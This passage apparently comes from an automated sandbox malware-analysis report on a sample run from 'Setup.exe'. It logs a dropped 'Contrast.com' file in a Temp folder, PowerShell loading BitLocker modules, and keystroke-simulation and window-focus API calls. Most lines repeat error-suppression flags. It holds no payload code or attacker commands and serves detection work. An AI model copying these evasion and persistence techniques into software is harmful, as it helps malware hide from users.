            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_04106A29 pushad ; ret 14_2_041071D3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_049036AD push ebx; iretd 17_2_049036DA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_049036DB push ebx; iretd 17_2_049036DA

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\108941\Contrast.comJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\108941\Contrast.comJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_005959B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_005959B3
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00525EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00525EDA
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_005333B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_005333B7
            Source: C:\Users\user\Desktop\'Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
